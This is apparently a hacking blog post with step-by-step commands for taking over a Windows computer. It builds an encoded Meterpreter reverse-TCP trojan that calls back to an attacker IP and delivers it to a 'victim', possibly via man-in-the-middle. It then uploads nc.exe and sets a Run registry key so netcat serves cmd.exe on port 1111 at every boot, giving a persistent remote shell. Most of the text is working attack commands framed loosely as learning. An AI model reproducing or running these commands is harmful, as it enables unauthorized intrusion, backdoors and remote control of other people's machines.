Upload nc.exe "OSbackdoor" to Victim Computer

Hallo guy's =)) Tonight i'm back again to learning exploitation Windows =)) and now i share this tutorial for you all =)

oke now just for fun and just for learning =))

First Step :

Make a new trojan and encoding trojan using metasploit framework:
#msfpayload windows/meterpreter/reverse_tcp LHOST=36.86.3.84 LPORT=4444 R | msfencode -a x86 -c 5 -b '\xff' -e x86/shikata_ga_nai -t exe > /var/www/attacker.exe

my IP-Address = 36.36.3.84

saving the trojan.exe in directory /var/www/ with the name attacker.exe

then, I send trojan to victim's computer (you can use MITM to get the attention of the victim )

now, we run a multi handler for listening meterpreter session from victim computer :

#msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=36.86.3.84 LPORT=4444 E


After getting meterpreter, then we upload nc.exe backdoor to the victim's computer :

meterpreter > upload (PATH YOUR Nc.exe) C:\\WINDOWS\\system32\\

the backdoor was successfully embedded in the victim's computer

now, we to do the registration to victim computer :

meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

and, register setvalue
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v H2 -d C:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe"

-p 1111 <== port that we use to connect back the victim's computer 

next, reboot the victim computer =)

when the victim runs the computer we only need the command:

#nc IP-Victim port 1111

example
#nc 192.168.xxx.xxx 1111

in this method we do not do exploits for the second time just type the command above, so we will get a command shell on victim's computer :) Very simple huh ? =))

to view the video please see the video below




Author By:
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Popular posts from this blog

Decrypt MD5 $Wordpress

Exploit Samba "SmbClient"

Configure Pure-FTP on Kali Linux